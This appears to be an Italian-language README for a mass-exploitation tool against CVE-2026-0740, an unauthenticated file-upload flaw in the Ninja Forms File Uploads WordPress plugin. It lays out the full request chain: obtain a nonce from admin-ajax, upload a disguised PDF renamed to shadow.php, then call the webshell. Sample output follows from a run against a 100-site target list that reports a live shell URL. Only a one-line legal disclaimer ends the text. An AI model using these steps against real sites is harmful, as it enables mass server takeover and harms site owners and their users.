
Automated mass exploiter per CVE-2026-0740, un upload arbitrario di file non autenticato nel plugin Ninja Forms File Uploads, che consente l'esecuzione remota di codice tramite upload appositamente predisposti.
Il plugin Ninja Forms - File Uploads per WordPress è vulnerabile al caricamento arbitrario di file non autenticato a causa della mancanza di validazione del tipo di file e della mancanza di controlli sulle capacità nella funzione 'NF_FU_AJAX_Controllers_Uploads::handle_upload' in tutte le versioni fino alla 3.3.26 inclusa.
Questa vulnerabilità consente ad attaccanti non autenticati di:
~ Punteggio CVSS: 9.8 (Critico)
~
Step 1: Ottieni il Nonce
────────────────────────────────────
POST /wp-admin/admin-ajax.php
Data: action=nf_fu_get_new_nonce&field_id=7&form_id=7
Response: {"success":true,"data":{"nonce":"7a850757a1"}}
│
▼
Step 2: Carica File Camuffato + Rinomina in PHP
──────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
Data:
- action=nf_fu_upload
- nonce=7a850757a1
- field_id=7
- form_id=7
- [email protected] (estensione consentita)
- doc_pdf=shadow.php (destinazione rinomina)
│
▼
Step 3: Il Server Archivia il File Dannoso
─────────────────────────────────────
Posizione: /wp-content/uploads/ninja-forms/tmp/shadow.php
Contenuto: shell PHP (uploader / webshell)
│
▼
Step 4: esegui il file caricato
────────────────────────────────────
GET /wp-content/uploads/ninja-forms/tmp/shadow.php
→ Esegui la webshell
→ Compromissione totale del server
- Conclusioni dagli esperimenti sul campo:
1. L'endpoint `nf_fu_get_new_nonce` restituisce un nonce valido senza verificare l'esistenza del campo
→ Nessuna validazione dei parametri `field_id` e `form_id` (QUALSIASI ID casuale funziona)
2. Difetto logico critico nella funzionalità di rinomina
→ Il plugin accetta un nome file fornito dall'utente tramite parametro POST
→ Nessuna validazione sull'estensione finale del file dopo la rinomina
3. Il file caricato finisce direttamente in una directory accessibile dal web
→ /wp-content/uploads/ninja-forms/tmp/
4. Il proprietario di questo strumento è molto affascinante
˚⊱🪷⊰˚ NINJA FORMS MASS EXPLOITER ˚⊱🪷⊰˚
╰┈➤ Visualizzazione completa della risposta
[+] Caricati 100 obiettivi
[1/100]
😈 [FRISKA RESEARCHER] Attacco a: https://example.com
[*] Recupero nonce...
[*] Stato HTTP: 400
[*] Risposta: 0
[-] Errore HTTP: 400
[2/100]
😈 [FRISKA RESEARCHER] Attacco a: https://www.test.com
[*] Recupero nonce...
[*] Stato HTTP: 200
[*] Risposta: {"success":true,"data":{"nonce":"b0404ec210","nonce_expiry":1775648146}}
[+] Nonce: b0404ec210
[*] Caricamento shell...
[*] Risposta di caricamento: {"data":{"files":[{"name":"doc.pdf","full_path":"doc.pdf","type":"application\/pdf","tmp_name":"shadow.php","error":0,"size":246,"new_tmp_key":"doc_pdf"}]},"errors":[],"debug":[]}
============================================================
🔥 SHELL UPLOADER: https://www.test.com/wp-content/uploads/ninja-forms/tmp/shadow.php
============================================================
L'uso non autorizzato di sistemi che non possiedi o per cui non hai il permesso di testare è illegale.